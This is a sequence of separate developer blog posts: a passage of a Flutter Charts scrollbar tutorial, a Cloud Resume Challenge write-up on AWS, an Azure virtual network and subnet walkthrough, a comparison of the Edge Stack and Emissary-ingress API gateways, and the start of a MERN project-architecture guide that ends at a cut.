When using the series' bottom left position as the annotation's x and y coordinates, the annotation will be placed in the center of the given position by default, because the default [horizontalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/horizontalAlignment.html "horizontalAlignment property for Flutter") and [verticalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/verticalAlignment.html "verticalAlignment property for Flutter") of the annotation is [center](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#center "center value for ChartAlignment enum in Flutter"). However, in our case, the annotation must treat the position as center left, which can be done by setting the chart's [horizontalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/horizontalAlignment.html "horizontalAlignment property for Flutter") as [near](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#near "near value for ChartAlignment enum in Flutter") and [verticalAlignment](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/CartesianChartAnnotation/verticalAlignment.html "verticalAlignment property for Flutter") as [center](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/ChartAlignment.html#center "ChartAlignment enum methods for Flutter"). Despite this adjustment, the scrollbar does not stretch to the entire axis length by default, so set the series width on the scrollbar using the [SizedBox](https://api.flutter.dev/flutter/widgets/SizedBox-class.html "SizedBox class for Flutter"). Refer to the following code example.

```dart
// SchedulerBinding requires `import 'package:flutter/scheduler.dart';`
Size _scrollbarSize = Size.zero;
Offset _horizontalScrollbarStart = Offset.zero;

void _updateScrollBarSize(Size size) {
  SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) {
    if (size != _scrollbarSize) {
      setState(() {
        _scrollbarSize = size;
        _horizontalScrollbarStart = Offset(0, size.height);
      });
    }
  });
}

SfCartesianChart(
  ...
  annotations: [
    CartesianChartAnnotation(
      x: _horizontalScrollbarStart.dx,
      y: _horizontalScrollbarStart.dy,
      coordinateUnit: CoordinateUnit.logicalPixel,
      horizontalAlignment: ChartAlignment.near,
      widget: SizedBox(
        width: _scrollbarSize.width,
        ...
      ),
    ),
  ],
);
```

## Adding a scrollbar on Y-axis

This can be achieved using the vertical [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") widget as an annotation on the Flutter Charts widget. We have used the actual chart data point range for the x-axis scrollbar range; now, we will implement a different method for the y-axis scrollbar.

Let's assume the scrollbar's minimum value is 0 and the maximum is 1. Based on the range selected in the chart, the scrollbar range will need to be updated. Let's explore how to accomplish this.

To display the actual scrollbar UI, remove the thumb and overlay from the SfRangeSlider using the **SfRangeSliderTheme**. Similar to the x-axis scrollbar, position the scrollbar on the y-axis.
Obtain the series size using a custom series renderer and position the vertical [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter"), stretching its height to the entire axis height. If the y-axis is placed on the left (the default), we can simply position the scrollbar at [Offset.zero](https://api.flutter.dev/flutter/dart-ui/Offset/zero-constant.html "Offset.zero property for Flutter"). If it is positioned on the right side (when opposedPosition is true), we should get the series size and reposition it through the [postFrameCallback](https://api.flutter.dev/flutter/scheduler/SchedulerBinding/addPostFrameCallback.html "addPostFrameCallback method for Flutter"). Refer to the following code example.

```dart
void _updateScrollBarSize(Size size) {
  SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) {
    if (size != _scrollbarSize) {
      setState(() {
        _scrollbarSize = size;
        _verticalScrollbarStart = Offset(size.width, size.height);
      });
    }
  });
}

SfCartesianChart(
  ...
  annotations: [
    CartesianChartAnnotation(
      x: _verticalScrollbarStart.dx,
      y: _verticalScrollbarStart.dy,
      coordinateUnit: CoordinateUnit.logicalPixel,
      verticalAlignment: ChartAlignment.far,
      widget: SizedBox(
        width: 6, // Max size from the active and inactive track.
        height: _scrollbarSize.height,
        child: SfRangeSliderTheme(
          data: const SfRangeSliderThemeData(
            thumbRadius: 0,
            overlayRadius: 0,
          ),
          child: SfRangeSlider.vertical(
            min: 0,
            max: 1,
            values: values,
            ...
          ),
        ),
      ),
    ),
  ],
)
```

The [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") will be updated only when the widget rebuilds with new values. Therefore, wrap it in a [ValueListenableBuilder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder-class.html "ValueListenableBuilder<T> class for Flutter") and update the listenable value in the chart's [onActualRangeChanged](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/onActualRangeChanged.html "onActualRangeChanged property for Flutter") callback by converting the visible range values into a range from 0 to 1.

When changing the listenable value, the [ValueListenableBuilder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder-class.html "ValueListenableBuilder<T> class for Flutter") rebuilds its child using the [builder](https://api.flutter.dev/flutter/widgets/ValueListenableBuilder/builder.html "builder property for Flutter") callback. Within this callback, use the new range values that were updated in the [onActualRangeChanged](https://pub.dev/documentation/syncfusion_flutter_charts/latest/charts/SfCartesianChart/onActualRangeChanged.html "onActualRangeChanged property for Flutter") callback. This will ensure that the [SfRangeSlider](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider-class.html "SfRangeSlider class for Flutter") is updated to reflect the new visible range.

```dart
// Assumed field backing the ValueListenableBuilder below (not shown in the post):
// final ValueNotifier<SfRangeValues> _yScrollbarSelectedValues =
//     ValueNotifier(SfRangeValues(0.0, 1.0));
late num _yAxisActualMin;
late num _yAxisActualMax;

SfCartesianChart(
  ...
  onActualRangeChanged: (ActualRangeChangedArgs args) {
    if (args.axisName == 'primaryYAxis') {
      _yAxisActualMin = args.actualMin;
      _yAxisActualMax = args.actualMax;
      SchedulerBinding.instance.addPostFrameCallback((Duration timeStamp) {
        final num actualRange = args.actualMax - args.actualMin;
        double visibleMinNormalized =
            (args.visibleMin - args.actualMin) / actualRange;
        double visibleMaxNormalized =
            (args.visibleMax - args.actualMin) / actualRange;
        _yScrollbarSelectedValues.value =
            SfRangeValues(visibleMinNormalized, visibleMaxNormalized);
      });
    }
  },
  annotations: [
    CartesianChartAnnotation(
      ...
      widget: SizedBox(
        width: 6,
        height: _scrollbarSize.height,
        child: ValueListenableBuilder<SfRangeValues>(
          valueListenable: _yScrollbarSelectedValues,
          builder: (BuildContext context, SfRangeValues values, Widget? child) {
            return SfRangeSliderTheme(
              ...
              child: SfRangeSlider.vertical(
                min: 0,
                max: 1,
                values: values,
                ...
              ),
            );
          },
        ),
      ),
    ),
  ],
)
```

That’s it. Now, the y-axis scrollbar will be updated whenever the y-axis range changes through chart interactions or direct APIs. One more thing: if you need to update the chart range when dragging the y-axis scrollbar (range slider), convert the new values from [onChanged](https://pub.dev/documentation/syncfusion_flutter_sliders/latest/sliders/SfRangeSlider/onChanged.html "onChanged property for Flutter") to actual axis values and assign them to the chart axis controller’s visible minimum and maximum properties.

```dart
import 'dart:ui' show lerpDouble;

late NumericAxisController _yAxisController;

SfCartesianChart(
  ...
  primaryYAxis: NumericAxis(
    ...
    onRendererCreated: (NumericAxisController controller) {
      _yAxisController = controller;
    },
  ),
)

SfRangeSlider.vertical(
  min: 0,
  max: 1,
  values: values,
  onChanged: (SfRangeValues newValues) {
    _yAxisController.visibleMinimum = lerpDouble(
        _yAxisActualMin, _yAxisActualMax, newValues.start);
    _yAxisController.visibleMaximum = lerpDouble(
        _yAxisActualMin, _yAxisActualMax, newValues.end);
  },
)
```

Refer to the following image.

<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2024/07/Adding-scrollbars-to-the-X-and-Y-axes-of-the-Flutter-Charts-widget.gif" alt="Adding scrollbars to the X and Y-axes of the Flutter Charts widget" style="width:100%">
<figcaption>Adding scrollbars to the X and Y-axes of the Flutter Charts widget</figcaption>
</figure>

## GitHub reference

For more details, refer to [adding scrollbars in the Flutter Charts GitHub demo](https://github.com/SyncfusionExamples/flutter_scrollbar_chart "Adding scrollbars in the Flutter Charts GitHub demo").

## Conclusion

Thanks for reading! In this blog, we learned how to add and synchronize scrollbars in the Syncfusion [Flutter Charts](https://www.syncfusion.com/flutter-widgets/flutter-charts "Flutter Charts") widget. With this, you can seamlessly zoom and pan in the charts to view the data points in detail and get insights. Give it a try, and leave your feedback in the comment section below.

Check out the other features of our Flutter Charts and Sliders in the [user guide](https://help.syncfusion.com/flutter/ "Syncfusion Flutter widgets - API reference") and explore our [Flutter Charts and Sliders widget samples](https://github.com/syncfusion/flutter-examples "Syncfusion Flutter demos on GitHub").
Additionally, check out our demo apps available on different platforms: [Android](https://play.google.com/store/apps/details?id=com.syncfusion.flutter.examples "Syncfusion Flutter UI Widgets on Google Play Store"), [iOS](https://apps.apple.com/us/app/syncfusion-flutter-ui-widgets/id1475231341 "Syncfusion Flutter UI Widgets on App Store"), [web](https://flutter.syncfusion.com/?_ga=2.113248516.2088510317.1618203864-1079363253.1592211341 "Syncfusion Flutter UI Widgets Web"), [Windows](https://www.microsoft.com/store/productId/9NHNBWCSF85D "Syncfusion Flutter UI Widgets on Microsoft Store"), and [Linux](https://snapcraft.io/syncfusion-flutter-gallery "Syncfusion Flutter Gallery on Snapcraft"). If you need a new widget for the Flutter framework or new features in our existing widgets, you can contact us through our [support forums](https://www.syncfusion.com/forums "Syncfusion Support Forum"), [support portal](https://www.syncfusion.com/support/directtrac/incidents "Syncfusion Support Portal"), or [feedback portal](https://www.syncfusion.com/feedback/flutter "Syncfusion Feedback Portal"). As always, we are happy to assist you! ## Related blogs - [Introducing the New ROC and WMA Indicators in Flutter Charts](https://www.syncfusion.com/blogs/post/roc-and-wma-indicators-flutter-charts "Blog: Introducing the New ROC and WMA Indicators in Flutter Charts") - [What’s New in Flutter: 2024 Volume 2](https://www.syncfusion.com/blogs/post/whats-new-flutter-2024-volume-2 "Blog: What’s New in Flutter: 2024 Volume 2") - [Syncfusion Essential Studio 2024 Volume 2 Is Here!](https://www.syncfusion.com/blogs/post/syncfusion-essential-studio-2024-vol2 "Blog: Syncfusion Essential Studio 2024 Volume 2 Is Here!") - [Open and Save PDF Files Locally in Flutter](https://www.syncfusion.com/blogs/post/open-save-pdf-locally-flutter "Blog: Open and Save PDF Files Locally in Flutter")
jollenmoyani
1,921,266
My Cloud Resume Challenge
Here's my shot at the Cloud Resume Challenge...
0
2024-07-15T14:13:46
https://dev.to/anthony_coughlin_f0ae1698/my-cloud-resume-challenge-j4p
Here's my shot at the Cloud Resume Challenge: https://cloudresumechallenge.dev/docs/the-challenge/aws/

I managed to complete the challenge after two weeks. Well, if I'm completely honest, I did not take the AWS Cloud Practitioner certification, but I plan to get that in the future. I'm a QA Manager by trade, but I have quite a bit of cloud experience, mainly with Azure. It would have been much easier to just do the challenge with Azure, but the whole purpose of the challenge is to learn, so I opted for AWS.

One of the questions I continually see asked on forums related to this challenge is the cloud cost. At the time of writing, here's what I've spent in total:

- Domain Purchase - $17.34
- AWS Route 53 - $0.51
- AWS Storage - $0.003
- AWS API Gateway - $0.001
- Total - $17.86

I would expect the costs here to increase depending on traffic, but I've mainly taken advantage of the AWS free tier as much as possible. My frugality has its drawbacks: the visitor count API doesn't refresh the visitor data as quickly as I would have hoped. Cost is a factor here, but it's an acceptable trade-off.

Below is the blurb listing the tools, technologies, etc.

## Github

https://github.com/antowaddle/cloud-resume-sam-template

## Live Site

https://anthony-coughlin-resume.com/

---

## Introduction

The Cloud Resume Challenge encourages participants to build a serverless web application on AWS, focusing on practical AWS skills and modern web development techniques. This challenge is an opportunity to showcase expertise in AWS services and enhance one's portfolio with a real-world project.

---

## Technologies Required

<details>

| Technology | Description |
|--------------------|------------------------------------------------------------------|
| AWS S3 | Static website hosting |
| AWS API Gateway | Create RESTful APIs |
| AWS Lambda | Serverless compute |
| AWS DynamoDB | NoSQL database |
| AWS CloudFormation | Infrastructure as code |
| AWS IAM | Identity and Access Management |
| AWS CodePipeline | Continuous integration and continuous delivery pipeline |
| AWS SAM | Serverless Application Model |
| HTML/CSS | Frontend development |
| JavaScript | Frontend and backend development |
| Python | APIs and Tests |
| YAML | Infrastructure as code (CloudFormation and SAM templates) |
| Terraform | Infrastructure as code |

</details>

## Architecture Diagram

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tmshkvlpdmxuy0x7zh4j.png)

## Points of the Challenge

<details>

1. **Create a static resume website**: Host your resume as a static website on AWS S3. ✅ I used Amazon S3 static website hosting; it was relatively easy to set up and deploy with AWS SAM.
2. **Use AWS Lambda**: Implement Lambda functions to handle backend tasks, such as contact form submissions. ✅ The Lambda function code for the Get and Put requests was written in Python.
3. **Utilize AWS API Gateway**: Create APIs to interact with Lambda functions. ✅ As per the above, the APIs accept requests from the web app and communicate with the DB.
4. **Integrate DynamoDB**: Store and retrieve data using DynamoDB, such as visitor statistics. ✅ I switched to using Terraform to deploy my DynamoDB table.
5. **Implement AWS CloudFormation**: Define your AWS infrastructure as code for reproducibility. ✅ Managed by AWS SAM, with stack(s) created and resources defined within.
6. **Set up IAM roles**: Manage permissions and security using IAM roles and policies. ✅ A specific user that will remain nameless was set up to configure all the resources.
7. 
**Implement CI/CD pipeline**: Use GitHub Actions for automated deployment and updates. ✅ I created a pipeline using GitHub Actions with stages to test, deploy infra, deploy the site, and then retest (using Playwright).
8. **Design frontend**: Develop a responsive frontend using HTML, CSS, and JavaScript. ✅ I'm no front-end guru, so I kept it relatively simple.
9. **Version control**: Use Git for version control and collaborate via GitHub or another repository. ✅ Does anyone use anything other than GitHub these days?
10. **Optimize for cost**: Implement cost-effective solutions, utilizing AWS free tier resources where possible. ✅
11. **Testing**: Conduct testing to ensure functionality and performance. Unit and UI tests added using Playwright. ✅
12. **Deploy publicly accessible site**: Ensure your resume website is publicly accessible and optimized for performance. ✅

## Challenges

Here are a few things I struggled with:

1. AWS SAM - I encountered several gotchas while using AWS SAM. I ended up switching to Terraform to deploy the DB. In hindsight, I should have used Terraform from the start.
2. Certificates - I unfortunately created a cert in the wrong region, and it had to be deleted. It was very challenging to recreate the cert and associate it with the domain. Be careful with how you create certs, and don't delete them!
3. DynamoDB - it's plug and play, right? Yes, technically true, and great when things go right. Unfortunately for me, the table was not getting updated through my put command; I had to do quite a bit of reading to get things in order (see the sketch at the end of this post).

</details>

## Conclusion

So overall, that is it. In terms of time, it took me around two weeks and several hours of tearing my hair out to complete. The journey was bumpy, not to mention that we've got a newborn and a two-year-old at home, which didn't make things easy. This is an excellent challenge: throw yourself in, make mistakes, feel good, feel stupid and, most importantly, learn.

---
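For anyone hitting the same DynamoDB wall: here's a minimal sketch of the kind of atomic-counter update a visitor counter needs, using the AWS SDK for JavaScript v3. This is illustrative only, not the exact code from this project; the table, key, and attribute names (`visitor-count`, `id`, `visits`) are hypothetical placeholders.

```typescript
import { DynamoDBClient } from "@aws-sdk/client-dynamodb";
import { DynamoDBDocumentClient, UpdateCommand } from "@aws-sdk/lib-dynamodb";

const docClient = DynamoDBDocumentClient.from(new DynamoDBClient({}));

// Atomically increments the counter and returns the new value.
// Table, key, and attribute names are hypothetical placeholders.
export async function incrementVisitorCount(): Promise<number> {
  const result = await docClient.send(
    new UpdateCommand({
      TableName: "visitor-count",
      Key: { id: "site" },
      // ADD creates the attribute on first use, so the item
      // doesn't need to be pre-seeded with a zero count.
      UpdateExpression: "ADD visits :inc",
      ExpressionAttributeValues: { ":inc": 1 },
      ReturnValues: "UPDATED_NEW",
    })
  );
  return (result.Attributes?.visits as number) ?? 0;
}
```

An `UpdateCommand` with an `ADD` expression avoids the read-modify-write race you can run into when a plain put overwrites the whole item.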
anthony_coughlin_f0ae1698
1,921,304
Creating An Azure virtual Network with Subnets
Outline Step 1: Introduction Step 2: Log in to Azure Portal Step 3: Create a Virtual Network Step 4:...
0
2024-07-12T20:55:01
https://dev.to/mabis12/creating-azure-virtual-network-with-subnets-1ei0
networking, azure, virtualsubnets, cloudcomputing
**Outline**

Step 1: Introduction
Step 2: Log in to Azure Portal
Step 3: Create a Virtual Network
Step 4: Configure the Basics Tab
Step 5: Configure IP Addresses Tab
Step 6: Configure Subnet
Step 7: Create Virtual Network
Step 8: Verification of Azure Virtual Network with Subnets

**Step 1: Introduction**

An Azure Virtual Network (VNet) is a network environment that can be used to run VMs and applications in the cloud. Once it is created, the services and virtual machines within the Azure network can interact securely with each other.

**Virtual network concepts**

- **Address space:** When creating a virtual network, you must specify a custom private IP address space using public and private (RFC 1918) addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign. For example, if you deploy a VM in a virtual network with the address space 10.0.0.0/16, the VM is assigned a private IP like 10.0.0.4.

- **Subnets:** Subnets enable you to segment the virtual network into one or more subnetworks and allocate a portion of the virtual network's address space to each subnet. You can then deploy Azure resources in a specific subnet. Just like in a traditional network, subnets allow you to segment your virtual network address space into segments that are appropriate for the organization's internal network. Segmentation improves address allocation efficiency. You can secure resources within subnets using Network Security Groups.

**Step 2: Log in to Azure Portal**

Go to the Azure Portal and log in with your Azure account credentials.

**Step 3: Create a Virtual Network**

- In the "Search the Marketplace" box, type "Virtual Network" and select it from the results.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/020ax37d2o7l4wxm2wby.png)

- Click "Create" to start the Virtual Network creation process.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k68tbd1dofvkukpin91x.png)

**Step 4: Configure the Basics Tab**

- Subscription: Choose your Azure subscription.
- Resource Group: Select an existing resource group or create a new one.
- Name: Enter a name for your virtual network.
- Region: Choose the Azure region where you want to create the VNet.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/l21zt4stoigd2q6ya6r3.png)

**Step 5: Configure IP Addresses Tab**

- Enter the address space for your VNet. To hold the four /26 subnets below, it needs to be at least a /24, such as 192.148.30.0/24 (256 addresses).

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i62rt62myrj3943uz4mh.png)

- Click "+ Subnet" to add a new subnet.

**Step 6: Configure Subnet**

- Name: Enter a name for your subnet.
- Address range (CIDR block): Enter the address range for the subnet, such as 192.148.30.0/26.
- Click "Add" to create the subnet.
- Repeat the above steps to create additional subnets within the same VNet, adjusting the address ranges accordingly. Each /26 subnet covers 64 addresses (a small script after Step 8 derives these ranges):

Subnet1: 192.148.30.0 - 192.148.30.63
Subnet2: 192.148.30.64 - 192.148.30.127
Subnet3: 192.148.30.128 - 192.148.30.191
Subnet4: 192.148.30.192 - 192.148.30.255

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oeyrzi4cuqpi55vsjf15.png)

- Security Tab (Optional): Configure network security options such as DDoS Protection and Firewall.
- Tags Tab (Optional): Add tags to your VNet for better organization.
- Review + Create Tab: Review your configuration and click "Create" to deploy the VNet.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jjdl90k87a0mco7ofk5a.png)

**Step 7: Create Virtual Network**

- Click on "Create".

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4fhafbflo42cum970wx1.png)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wys3vl5t8lbe8kc89ji5.png)

**Step 8: Verification of Azure Virtual Network with Subnets**

- Go to the "Virtual networks" section in the Azure portal.
- Select the newly created VNet.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tcoy83iwzo33bjdjjii3.png)

- Verify that the VNet and its subnets are listed with the correct configurations.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rbn6vo859s8s1d6h6ego.png)
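To sanity-check the CIDR math above, here is a small illustrative sketch (in TypeScript, purely for demonstration; the Azure portal computes these ranges for you) that derives the four /26 ranges from the 192.148.30.0/24 address space:

```typescript
// Derive equal-sized subnet ranges from a /24 address space.
// Assumes the count is a power of two (4 subnets -> 64 addresses each -> /26).
function subnetsOfSlash24(base: string, count: number): string[] {
  const [a, b, c] = base.split(".").map(Number); // e.g. 192.148.30
  const size = 256 / count; // addresses per subnet
  const prefix = 32 - Math.log2(size); // 64 addresses -> /26
  const ranges: string[] = [];
  for (let i = 0; i < count; i++) {
    const start = i * size;
    const end = start + size - 1;
    ranges.push(
      `${a}.${b}.${c}.${start}/${prefix} (${a}.${b}.${c}.${start} - ${a}.${b}.${c}.${end})`
    );
  }
  return ranges;
}

console.log(subnetsOfSlash24("192.148.30.0", 4));
// [ '192.148.30.0/26 (192.148.30.0 - 192.148.30.63)',
//   '192.148.30.64/26 (192.148.30.64 - 192.148.30.127)',
//   '192.148.30.128/26 (192.148.30.128 - 192.148.30.191)',
//   '192.148.30.192/26 (192.148.30.192 - 192.148.30.255)' ]
```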
mabis12
1,921,356
Differences Between Edge Stack and Emissary: A Breakdown
One of our new segments, Community Corner, features weekly deep dives into common questions we get in...
0
2024-07-15T06:00:00
https://www.getambassador.io/blog/differences-edge-stack-emissary
edge, apigateway, emissary, api
One of our new segments, Community Corner, features weekly deep dives into common questions we get in our Community across our products: [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway), [Telepresence](https://www.getambassador.io/products/telepresence), and [Blackbird](https://www.getambassador.io/www-getambassador-io/products/blackbird/api-development). As one of the core members of our customer team, one of the most common questions I see revolves around the key differences between our open-source offering, Emissary-ingress, and our commercial product, [Edge Stack API Gateway](https://www.getambassador.io/products/edge-stack/api-gateway).

[Watch Instead of Read](https://youtu.be/P8YvoQ_P4-M?si=rfDOWuWw_sALnP0t)

**The TL/DR:** [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is Ambassador's licensed API Gateway. It's a closed-source product that has been adopted by companies in various industries around the world to manage traffic to their cloud-based services. Emissary-ingress is an open-source gateway project developed by Ambassador. A fun fact: originally, Emissary went by our company name (Ambassador), but when we donated it to the CNCF, we changed the name to Emissary-ingress.

## Similarities

Both [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) and Emissary-ingress are built on Envoy and use Envoy Proxy as their core proxy. For those who want a refresher, Envoy is an open-source, high-performance proxy originally written by Lyft (the rideshare company). Both Edge Stack and Emissary-ingress make Envoy easier to configure. Additionally, architecturally speaking, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) and Emissary-ingress are both ideally suited for Kubernetes-based environments where you want to route external traffic to your microservices.

## Differences

There are three distinct areas where Emissary and Edge Stack differ (other than the obvious: open source vs. a paid product). The main differences you'll notice relate to the release schedules and regular maintenance, the feature set, and, of course, continued support.

## Release Schedule and Maintenance

As Ambassador's licensed API Gateway, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is maintained and regularly updated by Ambassador's in-house engineering teams. Edge Stack releases are made regularly for bug fixes, efficiency improvements, and enhancements. Our latest release, as of June 2024, was version 3.11.0.

For example, when it comes to Common Vulnerabilities and Exposures (CVEs) and security-impacting issues, we have a process for evaluating whether these issues impact Edge Stack's functionality and performance. If there are impacts, we implement a fix for Edge Stack in a minor version release. Occasionally, customers and users will ask about a particular CVE, and we share with them our evaluation results. With Edge Stack, you can expect regular support, maintenance, and protection against vulnerabilities to avoid disruption in your workflow.

Emissary-ingress, on the other hand, does not currently have a determined release schedule. In late 2023, Ambassador made the choice to decouple the Emissary release schedule from Edge Stack's schedule, and we moved the Emissary Slack Community over to the CNCF Community. Ambassador no longer serves as the primary maintainer of Emissary but works alongside other active community maintainers on the project.
This change was in response to several things, including requests from the CNCF, marketplace factors, and, most importantly, efforts to recenter our focus on the needs of our Edge Stack customers and our new API development tool, Blackbird. Although we do still merge PRs for CVEs that impact Emissary, we're not planning for any future releases. Emissary-ingress has always been a community project, and the release schedule going forward will depend on the maintainers collectively. The last release of Emissary-ingress was 3.9.1 in November 2023.

## Different Feature Sets

### Edge Stack Features

[Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) leverages key features in Envoy (service discovery, authorization, authentication, circuit breaking, retries, timeouts, logging, and distributed tracing) and makes them available and more easily configurable. As an API Gateway, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway)'s primary job is to route traffic securely to your services, and it does this through declarative Custom Resource Definitions, which are highly configurable. So you can determine how you want Edge Stack to listen for your traffic, what ports you want it to use, the granularity of your routes, and a host of other factors to fine-tune access to your services and service availability.

Edge Stack is highly scalable as well, which means it performs better in high-demand, high-load environments than many other gateways not built on Envoy. And you can employ both horizontal and vertical scaling strategies.

Some of the key features of Edge Stack include:

- Authentication: OAuth2, OIDC, JWT, and Single Sign-On
- Rate Limiting
- Web Application Firewall (WAF): configured to help protect your web applications by preventing and mitigating many common attacks
- Network Security with Cert-Manager Integration: TLS, mTLS, and CORS
- Request Resiliency
- Observability

### Emissary Features

On the other end, Emissary offers the following:

- Circuit breakers, automatic retries, and timeouts
- Observability: distributed tracing, real-time L7 metrics
- L4/L7 load balancing and routing for your traffic protocols

You'll note that Emissary doesn't include authentication, rate limiting, WAF, Single Sign-On, or network security with cert-manager integration, so adopters would need to implement these features independently or build them internally. In the end, Emissary-ingress is really more of an ingress with limited functionality, as the name suggests, whereas Edge Stack has the full feature set that provides everything you need at the edge in a fully fledged API Gateway.

## Continued Support

The final difference between the two, and critical in a business-focused production environment, is that [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is fully supported by Ambassador's knowledgeable and reputable Support team. Support is available on a 5 x 8 or 24 x 7 basis, depending on your needs. Users can raise tickets and get speedy responses and assistance. Users can also join our Slack channel, where we discuss implementation topics and new releases and keep everyone up to date with the latest versions, updates, and news.

Customers can also employ our new Knowledge Base. Hosted on our Support Portal, the Knowledge Base is a self-service collection of technical articles, FAQs, and best practices written by our Support team.
As it dives deeper into custom use cases and configuration details based on user questions, it's meant to be a resource on various implementation topics in addition to our formal docs.

On the other hand, since its inception, Emissary-ingress has been a community project, and going forward, it will be supported by the community on a peer-to-peer basis and by the maintainers collectively. There is a wide-reaching Emissary community and knowledge sharing among its members in the CNCF Slack channel and on GitHub. You can join that community via the CNCF Slack.

## Which Should I Choose?

Now, this might sound biased coming from the Ambassador team, but if you want the most actively supported, feature-rich, scalable, and configurable API Gateway option, [Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway) is the obvious choice. If price is your barrier, we do offer a free tier to test out all the proprietary features, such as authentication, Single Sign-On, and rate limiting, as a trial with 10,000 requests per month (RPMs). Our Growth plan option is also great for small teams and low-volume users, starting at only $1,000 a month.

[Learn more about Edge Stack](https://www.getambassador.io/products/edge-stack/api-gateway). And thank you for joining us on this Community Corner deep dive!
getambassador2024
1,921,374
How to optimize your MERN workflow with a solid architecture
We've probably encountered a MERN stack project on the internet that was perhaps the messiest thing...
0
2024-07-12T20:06:41
https://dev.to/fullstackdev/optimize-your-mern-workflow-with-a-solid-architecture-37p4
webdev, javascript, programming, architecture
We've probably all encountered a MERN stack project on the internet that was perhaps the messiest thing we've seen: everything crammed into one single file, front-end and back-end logic squeezed together, files and variables with random names making the codebase hard to explore, and no error handling whatsoever.

This is why a strong foundation has to be created before developing a MERN stack application, or **any other type of application for that matter**. A disorganized project structure can easily turn an app into a mess. With a proper template, you can develop an application that is functional, scalable, manageable, and easy to work with. Following standard practices can considerably improve the developer experience and code quality.

Let's dive right in.

## Principles of project structure

Before we go into these principles, here are some best practices you should follow to improve code readability and make your project easier to maintain.

### Best practices

1. Data management is the proper handling of data flow and state.
2. Use linting and formatting tools to enforce code standards.
3. Use version control tools like Git, with hosting platforms like GitHub or Bitbucket, to manage your code.
4. Implement unit tests to find issues early on, prevent unpredictable behavior from your code, and ensure code stability.
5. Error management requires putting robust error-handling procedures in place.

### Separation of concerns

Separation of concerns, or SoC, is an essential concept in programming that recommends breaking down a huge system into smaller, more manageable components, each with its own role, such as separating the front end from the back end.

### Organization

Organization means creating a directory structure with a consistent naming convention. Component-based architecture requires breaking down the user interface into reusable components, and routing includes setting up effective navigation within the app.

## Project architecture

This is how our project architecture should look.

```
project-name/
├── client/
│   ├── public/
│   │   ├── index.html
│   │   └── assets/
│   ├── src/
│   │   ├── services/
│   │   ├── components/
│   │   ├── pages/
│   │   └── App.js
│   └── index.js
├── server/
│   ├── controllers/
│   ├── models/
│   ├── routes/
│   ├── middleware/
│   └── index.js
├── package.json
├── .env
└── README.md
```

Let's talk about each folder and file in our structure and their role.

**Project Root**

- **package.json**: Contains information about the project, its dependencies, and scripts for running the application.
- **.env**: Contains environment variables like API keys and other information.
- **README.md**: The project documentation.

**Client Directory (frontend)**

### public

- **index.html**: The main HTML file for the application.
- **assets**: Folder that can contain images, fonts, and other static resources.

### src

- **services**: For making HTTP requests to the backend using Axios or Fetch.
- **components**: Reusable components.
- **pages**: Main views or screens of the application.
- **App.js**: The main entry point for the React application.
- **index.js**: The entry point for the client-side build process.

**Server Directory (backend)**

### controllers

- Contains logic for handling incoming HTTP requests and responding to them.

### models

- Defines the data structures (schemas) for the database.

### routes

- Defines the API endpoints and maps them to controller functions.

### middleware

- Contains functions that process requests before they reach the controllers (like error handling).
- **index.js**: The entry point for the Node.js server, typically responsible for setting up the Express app, database connections, and route handlers.

This architecture is **MVC** (Model-View-Controller) on the backend and **component-based** architecture on the frontend. The MVC architecture has a clear division: the three components are interconnected, and each is responsible for a different aspect of the application, making it easier to maintain. The sketch below shows the general shape of that wiring.
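To make the separation concrete, here is a minimal sketch of that wiring, assuming Express with TypeScript. All names (`itemRoutes`, `itemController`, `/api/items`) are illustrative, not prescribed:

```typescript
// server/index.ts - thin entry point: wiring only, no business logic.
import express from "express";
import itemRoutes from "./routes/itemRoutes";
import { errorHandler } from "./middleware/errorHandler";

const app = express();
app.use(express.json());
app.use("/api/items", itemRoutes); // routes map URLs to controllers
app.use(errorHandler); // errors are handled in one place
app.listen(3000, () => console.log("Server running on port 3000"));
```

```typescript
// server/routes/itemRoutes.ts - endpoints only; logic lives in the controller.
import { Router } from "express";
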